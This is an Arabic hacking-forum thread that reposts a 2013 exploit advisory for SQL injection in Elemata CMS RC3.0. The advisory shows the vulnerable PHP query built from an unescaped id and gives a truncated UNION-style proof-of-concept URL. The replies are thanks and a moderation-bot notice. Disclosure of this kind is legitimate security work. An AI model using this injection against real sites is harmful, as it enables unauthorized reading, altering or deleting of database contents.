1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
حالة الموضوع:
مغلق
  1. rachi-dz
    rankrank
    Developer

    عضو منذ:
    ‏6 يونيو 2012
    عدد المشاركات:
    52
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الوظيفة:
    طالب
    الإقامة:
    القيسة كدد
    السلام عليكم ورحمه الله وبركاتة


    ثغرة جديدة فى سكربت


    Elemata CMS RC3.0


    الثغرة
    كود PHP:
    # Exploit Title : Elemata CMS RC3.0 SQL Injection
    # Date : 23 June 2013
    # Exploit Author : CWH Underground
    # Site : www.2600.in.th
    # Vendor Homepage : http://www.elemata.com/
    # Software Link : http://jaist.dl.sourceforge.net/proj...emataRC3.0.zip
    # Version : RC 3.0
    # Tested on : Window and Linux

    ,--^----------,--------,-----,-------^--,
    | ||||||||| `
    --------' | O .. CWH Underground Hacking Team ..
    `+---------------------------^----------|
    `
    \_,-------, _________________________|
    / XXXXXX /
    `| /
    XXXXXX / `\ /
    / XXXXXX /\______(
    / XXXXXX /
    / XXXXXX /
    (________(
    `------'

    ##############################
    VULNERABILITY: SQL Injection
    ##############################

    /functions/global.php (LINE: 24-30)

    -----------------------------------------------------------------------------
    function e_meta($id)
    {
    include ("Connections/default.php");
    mysql_select_db($database_default, $default);
    $query_meta = "SELECT * FROM posts WHERE id = '
    $id'";
    $meta = mysql_query($query_meta, $default) or die(mysql_error());
    $row_meta = mysql_fetch_assoc($meta);
    -----------------------------------------------------------------------------

    ################################################## ###
    DESCRIPTION FOR SQL INJECTION
    ################################################## ###

    An attacker might execute arbitrary SQL commands on the database server with this vulnerability.
    User tainted data is used when creating the database query that will be executed on the database management system (DBMS).
    An attacker can inject own SQL syntax thus initiate reading, inserting or deleting database entries or attacking the underlying operating system
    depending on the query, DBMS and configuration.

    POC:

    http://http://localhost/elemata/?id=...L,NULL,NULL--+

    Then View Source !! 
     
    جاري تحميل الصفحة...
  2. روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    583
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    210
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     
  3. C.T
    rank
    Developer

    عضو منذ:
    ‏10 مارس 2012
    عدد المشاركات:
    14
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: Elemata CMS RC3.0 SQL Injection Vulnerability

    وعليكم السلام ورحمة الله وبركاته

    يعطيك العافية
    :{1}:​
     
  4. belhadj47
    rankrank
    Developer

    عضو منذ:
    ‏8 ديسمبر 2011
    عدد المشاركات:
    50
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    الجزائر
    رد: Elemata CMS RC3.0 SQL Injection Vulnerability

    مشكور أخي جاري تقييمك
     
  5. mr.mourad <span style="font-weight: bold; text-shadow: #BBBB
    V • I • P

    عضو منذ:
    ‏8 يوليو 2013
    عدد المشاركات:
    165
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    50
    نظام التشغيل:
    Linux
    رد: Elemata CMS RC3.0 SQL Injection Vulnerability

    يعطيك العافية اخي شكراً جزيلاً :{1}:
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...